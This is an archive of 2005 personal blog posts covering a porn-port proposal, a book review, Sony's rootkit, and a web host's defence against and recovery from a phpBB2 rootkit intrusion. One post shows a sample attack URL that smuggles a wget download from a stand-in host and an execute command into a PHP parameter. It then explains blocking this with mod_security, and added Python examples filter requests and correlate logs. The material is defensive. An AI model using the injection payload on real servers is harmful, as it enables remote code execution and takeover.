TCP/IP: The PornoPort

Posted on November 28th, 2005 in Technology by Rodney

I was just reading on that ultimate community & blogging site slashdot.org about some guy who wants to legislate a specific TCP port for porn.

His proposal is that all porn (should I say pr0n?) should be available only on a specific protocol so it’s easier to block away from children, etc. Ok, on the surface, this idea has merits. No more having to check site content or publish only certain sites to students or employees – you could just block “port-666” – coz that’s the port I assume he’d like it dedicated to. That or “port-6969”.

Under the surface, the idea is about as useful as asking spammers to please send all their spam on a specific port, which we could all block. It requires buy in from people who are not going to buy in.

His solution to this: legislation. Seriously, he thinks American politicians should be allowed to tell the world how to behave (which American politicians already seem to think anyway). Oddly enough, he thinks they have the power to enforce this, which is an unfortunate way of thinking. He talks about penalties for non-compliance. So, should the US Congress then start penalising Swedes for not obeying US law, while they’re still at home in Sweden? Should the US invade China because they’re still using port 80 for their porn? Such thinking shows a complete lack of comprehension of the world and the internet in general. Either he doesn’t get the concept of the internet or he doesn’t get that there is a world outside the US’s borders. Probably a little of both.

In any case, it’s destined to fail if he heads down the legislation route. The internet is the pinnacle of free enterprise. If it’s a good idea, it will fly by itself. If the government has to step in and enforce it (which they can’t anyway) it will fail.

Some more stuff to think about
-=Rodney=-

God’s Debris

Posted on November 24th, 2005 in Books by Rodney

Book: God’s Debris
Author: Scott Adams

For anyone who likes a bit of something thought provoking, Scott Adams (think Dilbert) has come up with a new book. Well, it’s not that new but it’s new enough. Anyway, you can download it from here.

The concept of the book is to challenge the way you think about creationism, evolution, free thought, etc. An attempt to provide a different view on the ‘big questions’ in life.

In the end, he does provoke thought and make you try to stand up for your beliefs but his methodology is a little too thin. I mean, I know what I believe and I didn’t find the book offensive (he warns some people may be offended if they’re really touchy about religion, which I don’t consider myself to be :p) but he runs a simple and repeated dual attack: a) rush a paradox at you, ask you quickly to challenge it and move on and b) use the main character to try to mirror your reactions, and then quickly concede defeat.

This works because he throws something at you (usually a paradox) and asks you to defend yourself against it, then over the next page throws another, equally compelling paradox. You find yourself about to make a good argument, then you forget and start the next one. The net result is, most people who read it walk away convinced.

If you do stop and think about it though, none of the arguments are final or truly compelling – but they’re not meant to be. It’s just a guy’s chance to make people stop and think about themselves and their world, what they’re doing and how they’re doing it and to that end, he’s done well.

It left me with one outstanding thought, one he’s made in other Dilbert books (The Dilbert Future, specifically), which refers to humans thinking we have learnt so much and really are so close to understanding everything, or at least a lot of things. In The Dilbert Future he points out how every generation in history has thought this, so what makes us think we’re the exact first generation who got it right? But in God’s Debris, he elaborates on this quite well.

Here’s the concept (btw this is from the book, not my personal thoughts but like I said, it left me thinking). Humans don’t understand anything at all, at least not the way we think we do – not in a special way. You can teach a dog to do tricks or behave by cause and effect (get a treat or a smack) and we consider we have a better understanding than this but, from a certain perspective, we don’t. Take electricity. We know that if we do something (eg turn light switch on) then the light will probably come on. So far, no better than the dog.

Ok I know, you’re thinking “yes but I understand it better than that”. Do you? Ok, let’s see, shall we? You turn on the light switch and provide a current to a conductive material, which in turn causes an electromotive force (electron flow) to occur. This moves through the highly resistive material in the globe which generates a lot of heat, light being a by-product of this. Ta-da! Turned on the light! But what do we understand here? More than the dog? Well, this is just cause and effect, based purely on empirical data (i.e. statistics or, more realistically, personal experience). Ok, it’s a lot more complex than fetch-stick-get-pat but it’s no better. Do you know why the electrons flow when current is induced?

Right now you’re probably thinking, “no, but at least someone does, so as a species, we’re doing better.” Wrong. No one knows. Why does gravity attract something? No one knows. Magnets? Nope, no one there either. Yes, we understand what happens but we don’t know why. Ever. We’ve got nothing. Doctors, psychologists, physicists, chemists, the lot: nothing. All we have is an ever growing list of questions with no answers or unproven theories. All of which have failed to stand the test of time. Try it. Think of something humans have figured out and see if we really understand it – or if we just have a good idea of what happens to y when you do x.

So if you want to be a little challenged (for free!) go to the link above and have a read. If you like Dilbert, it’s probably up your alley but be forewarned: it’s not a humour book and there are no cartoons. It is however quite short and good for a lazy Sunday afternoon.

Result: Might upset some people, probably not too many who don’t live in the South of the US and well, they’re always miffed about something anyway. Won’t change the world or really shift anyone’s thinking long term but it will be good to discuss amongst your friends.

6.5/10

Till the next time I get bored! :)
Rodney.

Sony

Posted on November 23rd, 2005 in Ramblings by Rodney

Been reading about Sony lately?

Well, if you’re into technology and computers, you probably have but otherwise, you’re probably wondering what I’m talking about.

Did they post a record profit?

Did they invent a new technology that’s going to revolutionise the way we watch movies?

Did they intentionally propagate a rootkit with a back door they can open anytime onto tens of thousands of paying customers’ computers and illegally hide software on said customers’ computers to ensure they can always get back in?

Here’s a clue: in multiple choice exams, the longest answer is usually the correct one. This is no exception. Although in this case, a) will probably still come true anyway. Full story can be read here.

So yeah, Sony BMG decided that they’ve had enough of people stealing their music, it’s time to do something about it. Actually, it’s not the first time. Sony has been accused in the past of releasing worms on the P2P network KaZaa and there’s fairly solid evidence that that’s a fact, not a rumour. (Google: “sony worm virus kazaa” – there have been many).

This time, however, Sony changed their attack vector. Instead of going after people who are stealing their property via piracy, why not selectively and exclusively infect only those people who definitely have a legitimate Sony product? Brilliant! What Sony BMG chose to do was install an audio player on their new CDs which forces you to use their software to listen to the music. Now by itself, that’s not too bad. Here’s where it goes off the rails.

Sony first configured the autorun to install the software without your permission. It’s hidden and also fakes an uninstall, if you do try to remove it when you find it. Additionally, it opens a back door to Sony and informs them of every other piece of music on your computer. Sony emphatically denied this until it was proven to them without a doubt. The final piece of this wonderful software is that it’s not secure, so now non-Sony viruses are taking advantage of it. If you read the link above – you’ll see 3 American states are now suing Sony BMG over this. Of course, if you or I did this, we’d be off to prison for 10 years of rectal probing, but hey, Sony are rich and it’s America!

Of course, the whole thing takes on a slightly more humorous twist once you look under the surface. Ok – Sony BMG want piracy to stop and are fed up with people stealing their intellectual property. Many would say fair enough. Some might even say their vigilante and illegal action is justified (not many, but a few). Not a hell of a lot of people, however, would say it’s ok for Sony BMG to STEAL SOMEONE ELSE’S CODE to do it with. Yes, that’s right, Sony stole the code for their player from the Open Source project, LAME. Then violated the GNU GPL by trying to hide it.

The laughs keep on coming, however, when someone discovered that by putting a piece of sticky tape over the CD, the whole anti-copying software fails to load. Another reader points out: simply disabling autorun or holding down shift when you insert the CD also defeats the software.

So once again, the multi-billion dollar company’s multi-million dollar anti-piracy measures have been defeated by a few seconds’ worth of people’s time. Sony have had failed attempt after failed attempt at preventing people from ripping their CDs now, many of which have been circumvented using other equipment manufactured by Sony. Someone should really fire their whole technical advisory department. Here’s a clue, geniuses: if you can hear something, you can record it. If you can record it, you can copy it. Even if the CD outright won’t play on computers or will only play with your software, I can always plug the audio line out straight into the audio line in and just hit “record”. Sampling at 2×44,000Hz is no problem for modern sound cards, so there will be no loss of quality. How, exactly, do you stop that, Sony?

And that’s Sony’s new angle: finally they’ve realised that it’s impossible to stop people copying music that they can play, so they’ve adopted a new policy – music people won’t play. It’s called ‘Project Brittany Spears’.

Till next time.
Rodney

An In-depth Look at Hacking the WebServer

Posted on November 23rd, 2005 in IT Security by Rodney

Ok, so here’s the first in my “Getting better security” series of posts. Let’s start off with fixing the Web Server.

Ok, to begin with, what’s the attack vector here? When we’re looking to block an attack, we really want to know where it’s coming from. Usually, you’d look in your logs and see what’s coming in and what’s the flavour of the month but also try to think about what is possible. So, that’s it: we’re looking at the logs and this means we’re thinking about what’s coming in via URL requests.

So, let’s start by thinking about how people attack you via the URL. When I want to pass something to a Web server I can use two methods (ok, I’m generalising but stick with me): GET and POST. Of these, most attacks are coming in via a GET.

So what’s the difference? If I go to www.someplace.com/login.php, I’m doing a GET. If, when I fill my details in and hit enter, the URL changes to something like www.someplace.com/logincheck.php?user=ok – that’s also a GET. If the URL gives away no clues, we’re working with POST. POST sends the variables in the body of the request, out of sight, whereas GET sends them out in the open in the URL, for the webserver to, well, “get”. Obviously, GET is the easy target here. We can clearly see what’s going on and start to manipulate it. Strangely enough, it’s also far more common.

Now, PHP and ASP code, among others, handle both GET and POST and they’ve both received a lot of negative publicity because of the ease with which a lot of code written in either language is exploited. Let’s be clear that this is not really the languages’ fault – it’s the coders’ – but I digress. The point is we are thinking about a way to protect ourselves from people crafting URLs for negative reasons. Let’s have a look at some examples of what people can do.

In this example, someone tries to trick the web server into allowing them to upload code:
http://www.someplace.com/phpcode.php?php_root_dir=/tmp;%20wget%20http://www.nastyplace.com/nastyfile;./tmp/nastyfile

Ok – so it’s oversimplified but you get the idea. They try to change the directory, try to wget a file (for the record, %20 is a space and the “;” does the same as pressing enter at a command prompt) and then they try to run that file. We can see a whole bunch of things we don’t want to allow right there and in normal circumstances, you’d rely on user permissions to prevent this from working. Your OS would say to the web server “sorry, you aren’t allowed to write to /tmp, get lost”. Of course, this also assumes that the php code is dumb enough to allow such a thing but the remarkable thing is a lot of the stuff people download out there is exactly dumb enough to allow this. phpBB & phpNuke, for example, which are in use across hundreds of thousands of sites.

What happens, though, if your web server can write to /tmp? In short? You’re in deep shit. Someone can upload code and execute it, which may be all they need to elevate permissions and get administrator / root control of your box. Ok – seems a little far fetched? Guess what – by default, if you’re running Windows 200x Server, IIS can indeed write to most of the hard disk because the “everyone” group has permission. Also, on Linux (before you get too smug), Apache can write to /tmp or /var/tmp. So if it gets this far, you’re now relying on your kernel preventing elevation, or to put it another way, you’re now relying purely on patches and the hope that they’re up to date and cover the unknown. Good luck.

The obvious conclusion is this: don’t let people put bad code on your server. The solution to that, however, means you must comb through and test every single line of code on every web page and the fact is, you can’t. Even if you did, the client would probably just change the code later, so we need something else here. Something to stop the web server from even being subjected to these attacks.

Enter pre-filtering requests. That is, we inspect the URL as a string prior to processing it, and if it has something we don’t like, we don’t process it. There are two ways to do this: URLScan (IIS) or mod_security (Apache). In this article I won’t go into much detail on URLScan because it’s an “on or off” tool. You install it and it just blocks things Microsoft deem to be bad; in effect, it just blocks really long strings that are buffer overflow attempts. It’s good but it’s not great. It’s built into IIS6 but a downloadable add-on for IIS5.

mod_security, on the other hand, is customisable. You have complete control over what it does (which is great of course only if you know how to use it :) ). So let’s view our attempt from above, where someone tries to use a few simple tools to do things on your server. Firstly and most obviously, wget. Why the hell would a legitimate website ever ‘wget’ anything? Chances are, it wouldn’t. Ok, let’s see how we block it.

I’m going to assume you’ve already installed it. This is a Blog, not a howto, but if you go to http://www.modsecurity.org/index.php you’ll find all you need. Let me just say, it’s very easy. In any case, once installed, I need two words to filter out wget – ‘SecFilter wget’. That’s it, the above attack will now fail. A few more simple lines gives you all the power of URLScan (available at the above URL) and then you can customise it to your heart’s content.

Before I go, you may recall (it’s been a long post) that there was also the problem of POST-based attacks. They’re rarer but not impossible. The reason is that the attack has to come from within another page, so someone has to go to the trouble of targeting you specifically, not just a worm (although a worm could theoretically do this easily). So, how do we keep ourselves safe from attacks where we don’t have the luxury of seeing the URL before the webserver does? Fortunately, mod_security can inspect POST bodies as well as GET requests, so really, it’s no extra work!
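To make the pre-filtering idea concrete, here is an added Python example (not code from this post, nor from the mod_security or URLScan projects): it percent-decodes the request, runs a couple of deny rules such as the equivalent of ‘SecFilter wget’ over both the query string and the POST body, and refuses over-long requests the way URLScan does. The rule set, the length cap and the sample requests are assumptions chosen to mirror the attack URL above.

```python
"""Request pre-filter in the spirit of the post's 'SecFilter wget' rule.

Added example, not from the original post or from mod_security/URLScan:
rules, size cap and sample requests are assumptions.
"""
import re
from typing import Tuple
from urllib.parse import unquote_plus

MAX_REQUEST_LEN = 2048   # URLScan-style cap on over-long requests (assumed value)
MAX_DECODE_ROUNDS = 3    # bound on repeated %-decoding (catches %2520 -> %20 -> space)

# Deny rules, run against the fully decoded query string and POST body.
DENY_RULES = [
    # The two-word rule from the post: a legitimate page never needs to wget anything.
    ("wget", re.compile(r"\bwget\b", re.IGNORECASE)),
    # Shell separators and substitution: ';' acts like pressing enter at a prompt.
    ("shell-metachar", re.compile(r"[;|`]|\$\(")),
]


def normalize(text: str) -> str:
    """Percent-decode to a fixed point (bounded), so a double-encoded
    '%2520wget%2520' cannot hide 'wget' from the word-boundary rule."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def prefilter(method: str, target: str, body: str = "") -> Tuple[bool, str]:
    """Decide whether a request may reach the application.

    target: request path plus query string, as it appears in the access log.
    body:   raw form-encoded POST body ('' for GET); inspected with the same
            rules, which is the point the post makes about mod_security.
    Returns (allowed, reason).
    """
    parts = [("query", target)]
    if method.upper() == "POST":
        parts.append(("body", body))
    for label, raw in parts:
        if len(raw) > MAX_REQUEST_LEN:
            return False, f"{label}: exceeds {MAX_REQUEST_LEN} bytes"
        decoded = normalize(raw)
        for name, pattern in DENY_RULES:
            if pattern.search(decoded):
                return False, f"{label}: matched rule '{name}'"
    return True, "clean"


if __name__ == "__main__":
    # Constructed sample requests: the post's attack URL, a double-encoded
    # variant, a normal login, and the same attack moved into a POST body.
    samples = [
        ("GET", "/login.php", ""),
        ("GET", "/logincheck.php?user=ok", ""),
        ("GET", "/phpcode.php?php_root_dir=/tmp;%20wget%20http://www.nastyplace.com/nastyfile;./tmp/nastyfile", ""),
        ("GET", "/phpcode.php?php_root_dir=/tmp%253B%2520wget%2520http://www.nastyplace.com/nastyfile", ""),
        ("POST", "/logincheck.php", "user=ok&pass=s3cret"),
        ("POST", "/logincheck.php", "user=ok;%20wget%20http://www.nastyplace.com/nastyfile"),
    ]
    for method, target, body in samples:
        allowed, reason = prefilter(method, target, body)
        print(f"{'ALLOW' if allowed else 'BLOCK':5} {method:4} {target[:60]:60} {reason}")
```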

Ok, that’s the start of a look at hacking a web server and preventing it. It goes without saying that you must keep your system patched and firewalled but this offers a little something extra. Hope you enjoyed it.

l8r,
Rodney.

More on IT Security

Posted on November 23rd, 2005 in IT Security by Rodney

So anyway, after my last posting, which was about a (thankfully very minor and not entirely successful) hacking attempt, I’ve been getting back into security. Have let it slip too much lately. When I set the server up, security was everything and I made it strong and solid. The problem is, time moved on and I didn’t. I got lax because things were going well. I had my ‘2003 secure’ server and let’s be honest here, I just forgot about it all. Life moved on.

Well… It’s wake up time.

For those of you involved in the world of sticking stuff on the web (let’s call it hosting), you are probably familiar with the nightmare that is your weblogs. If you’re not one of those people let me fill you in. Someone (or something, a bot usually) tries to ‘hack’ you about 100 times a minute. It’s just non-stop, full on, all day every day. The more stuff you host, the worse it is.

So anyway, with that in mind, I decided to set out on securing something better than it is now, at least once a week. While I do this, I’m going to record how and store it on this Blog, in the hope that at least one other person gets some benefit from it because I have had so much help from others, I really need to offer some back.

I won’t go into any more detail in this BLOG, it’ll just be an announcement. Then I’ll keep each bit of info separate, so people don’t need to read this crap ;-)

Cya

Hacked

Posted on November 15th, 2005 in IT Security by Rodney

Ok, so life in the hosting business can truly suck sometimes.

On a daily basis, we all have to fend off about a billion passive attempts from worms and scripts, all trying to exploit our computers. People sitting at home on their Windows XP Home Ed computers sure cop a lot of it and the IIS servers of the world take the brunt but even those of us who chose a ‘safer’ option in the open source world have an endless and, eventually, losing, battle here.

When you’re a web host, it’s a million times harder. I have to not only open up services that I want or need but I have to open up ports and protocols at the whims of people who suffer badly from the “I want this but have no idea what I’m asking for” syndrome. It’s so often that someone will want some stupid 3rd party app enabled that needs to run as root and opens every port under the sun and hasn’t been patched since 1992… then you find out they never even used it.

When you try to explain to them that perhaps running PHP out of safe mode and enabling global variables might be a bad thing, they just complain “but some crappy thing I downloaded from spammers-r-us needs it!”. I know, you’re going to say “don’t let them”… well, it’s never that easy when they’re the paying customer and I’m the guy who has to play roshambo with the myriad of worms out there. For once, I just wish people would get this… But they don’t get it and they don’t care. And if it costs me several days to clean up the mess… they still don’t care.

Anyhow, there’s a point to this… yes… I got a rootkit installed. Thanks fuckers. r0nin rootkit, to be precise, which came in through a vulnerability in phpBB2, installed on a site by a client who, of course, wasn’t even using it. They just installed it and then decided, nah don’t need it. Did they patch it? Keep it up to date? No, they weren’t using it. Was it available to the world (worms too?) – hell yes!

Now, coz I *really* want to help the next poor bastard this happens to, I’m going to go through a little detail about how I found it, and what I can do about it.

I needed to change a setting on Apache, so I went into the conf file and made my change. Then I went to restart the service. Ok (yes, it’s RedHat): service httpd restart….. stopping (OK)… restarting (FAILED). Something is already on port 443.

Crap. That’s not good. So I figured that maybe a PID had locked or the like. Let’s have a quick look:
[root@halima]# netstat -lpn | grep '0.0.0.0:443'
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN 20893/r0nin

-Fuck-
Nothing good has a mixture of alphanumerics when it comes to executables. And I sure as hell didn’t put it there. Let’s kill it with a kill 20893. Does nothing, it restarts in a new PID. Over and over again. Damn it…

Next up, updatedb + locate r0nin as well as find / -name r0nin turn nothing up, so they’re hiding it a little better than not at all.

Trolling the logs turns nothing up so it’s time to try something new… what’s hiding in /tmp? Nothing… what about /var/tmp? newbash. Owned by user Apache and world executable. Bingo. Take a copy to look at later, delete it and kill the process… it stops and Apache resumes control of port 443.

Ok, the immediate problem’s passed but we’re not out of the woods yet. Hell, I’m not even sure what wood I’m in. But I have something nice – a file date/time stamp that’s actually believable (a week back). So let’s troll the logs for things that happened around then…

You’d never believe it but I actually found something at the same damn time, in a weblog for a client’s site, running, of course, phpBB2. A file called ‘viewtopic.php’ was hit at the same time, from an IP at internode (Adelaide/Australia based ISP).

Google viewtopic.php and see what comes up.. Guess what? r0nin rootkit of course! Turns out this is a known exploit that’s able to exploit this file in phpBB and has been around since 2004. A frikkin year! But the person who uploaded phpBB uploaded an old version they had sitting on their hard disk and never even thought that maybe, just maybe, they should check to see if there’s a newer version around?!
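The correlation step above (a believable file timestamp, then the logs around it) is easy to script, so here is an added Python example that is not from the original post: it parses Apache combined-format lines, pulls out every request within a window of the dropped file’s mtime, and flags the hits on viewtopic.php. The log lines, IP addresses and the drop time are constructed, and the list of scripts worth flagging is an assumption seeded with the one this post names.

```python
"""Correlate a dropped file's timestamp with Apache access-log entries.

Added example, not from the original post: log lines, addresses and the
drop time are constructed; WATCHED_SCRIPTS is an assumption.
"""
import os
import re
from datetime import datetime, timedelta, timezone
from typing import List, Optional

# Apache combined log format: ip ident user [ts] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"

# Scripts whose hits deserve a closer look when they line up with the drop time.
WATCHED_SCRIPTS = ("viewtopic.php",)

# Constructed sample of a client's phpBB2 access log (documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.10 - - [15/Nov/2005:02:40:12 +1030] "GET /forum/index.php HTTP/1.1" 200 5120
198.51.100.7 - - [15/Nov/2005:03:11:58 +1030] "GET /forum/viewtopic.php?t=12 HTTP/1.1" 200 2210
198.51.100.7 - - [15/Nov/2005:03:12:03 +1030] "GET /forum/viewtopic.php?t=12 HTTP/1.1" 200 2210
203.0.113.10 - - [15/Nov/2005:03:12:30 +1030] "GET /forum/index.php HTTP/1.1" 200 5120
203.0.113.10 - - [15/Nov/2005:05:00:01 +1030] "GET /forum/index.php HTTP/1.1" 200 5120
"""

# Constructed stand-in for the mtime of the /var/tmp/newbash file found in the post.
DROP_TIME = datetime(2005, 11, 15, 3, 12, 1,
                     tzinfo=timezone(timedelta(hours=10, minutes=30)))


def file_mtime(path: str) -> datetime:
    """Real-world replacement for DROP_TIME: a file's mtime as an aware datetime."""
    return datetime.fromtimestamp(os.stat(path).st_mtime, tz=timezone.utc)


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], TS_FORMAT)
    return entry


def entries_near(log_text: str, anchor: datetime,
                 window: timedelta = timedelta(minutes=5)) -> List[dict]:
    """All requests whose timestamp lies within +/- window of the anchor time."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and abs(entry["ts"] - anchor) <= window:
            hits.append(entry)
    return hits


def flag_suspects(entries: List[dict]) -> List[dict]:
    """Narrow the window down to hits on scripts with a known exploit history."""
    return [e for e in entries
            if any(e["target"].split("?")[0].endswith(s) for s in WATCHED_SCRIPTS)]


if __name__ == "__main__":
    near = entries_near(SAMPLE_LOG, DROP_TIME)
    print(f"{len(near)} requests within 5 minutes of the drop time")
    for e in flag_suspects(near):
        print(f"  {e['ts'].isoformat()} {e['ip']} {e['method']} {e['target']}")
```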

This is what I mean about hosting. I take responsibility for my machine and I know some of this rests with me but imagine if all the people out there who didn’t know / care about security had the ability to write to your computer – and you just have to let them. At the end of the day, there’s only so much you can do to protect yourself and only so much you can know about.

The good news is that because the server is configured securely, the process installed wasn’t able to achieve any of its payload and the bash script they ran wasn’t able to be exploited. Ordinarily, r0nin tries to deface websites, etc but it couldn’t do that in this case.

So now I’m off to do what has to be done with a hacked server. Yes, it’s all working and the attack vector has been silenced but it’s still time to burn it to the ground and start again. You just have to.

So until next time, cya later.
-=Rodney=-

—————————–
Some related reading:
Superb Blog by someone else in my shoes.

An excellent location for information

This blog is ok (for now… maybe :P )/